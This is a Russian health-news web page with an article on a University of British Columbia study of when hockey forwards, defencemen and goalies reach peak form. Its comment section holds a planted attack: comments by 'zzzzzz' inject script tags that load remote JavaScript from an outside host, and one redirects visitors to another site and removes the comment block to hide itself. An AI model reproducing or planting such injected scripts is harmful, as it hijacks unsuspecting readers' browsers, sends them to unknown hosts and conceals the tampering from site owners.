Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сможет ли наша сборная вы...  >>  Сможет ли наша сборная выиграть чемпионат мира?
 
Обратная связь
 

Сможет ли наша сборная выиграть чемпионат мира?

Размер шрифта
21 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Новое исследование, проведенное в Университете Британской Колумбии, позволило установить, когда именно хоккеисты находятся на пике своей формы. Возможно, именно эти данные позволят тренерам подобрать наилучший состав команд.

Сможет ли наша сборная выиграть чемпионат мира?

Исследование возглавил профессор Джеймс Бреннер из Саудерской школы бизнеса. Он обнаружил, что пик спортивной формы нападающих приходится на 27-28 лет, для защитников это период с 28 до 29, а вот физическая форма вратарей мало зависит от их возраста.

Бреннер также выяснил, что в течение нескольких лет до и после периода оптимальной спортивной формы спортсмены также могут проявить себя c наилучшей стороны (к примеру, для нападающих это период с 24 до 32 лет).

«Наши данные говорят о том, что тренеры и менеджеры команд вероятно принимают желаемое за действительное, когда надеются, что игроки в возрасте 24-25 лет будут значительно совершенствоваться с возрастом», – объясняет Бреннер. «Подавляющее большинство игроков к 24 годам проявляют себя на 90% от возможного».

Однако ученые не считают, что победителя можно определить только благодаря анализу возраста игроков соревнующихся команд. «Возраст игроков – это далеко не все. Огромное влияние на результат оказывают и другие факторы: от травм, полученных во время игры, до банального везения», – добавляет Бреннер.

Но не стоит недооценивать результаты этой работы, ведь благодаря им тренеры команд смогут более эффективно построить график тренировок и возможно даже смогут создать свою команду мечты.

Эти результаты были получены с использованием статистических моделей и были опубликованы в Journal of Quantitative Analysis in Sports.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:07

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Куда отправить мужа, если он мешает вам спать?   Лицо футболиста предскажет победителя Финала Лиги Чемпионов!   Чем мужчины лучше женщин?   Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!  
15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал! 26 января 2011Почему в старости спорт бесполезен
 
04 апреля 2013Когда делать зарядку, чтобы худеть быстрее 19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?
 

Слайдшоу

1
Упражнения для улучшения сексуальной жизни
Какие ошибки не дадут вам похудеть в Новом году
Руководство по предотвращению инсульта

Тесты

1
Правильно ли вы худеете?
Готовы ли вы сбросить лишнее?
Яички – удивительный орган
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.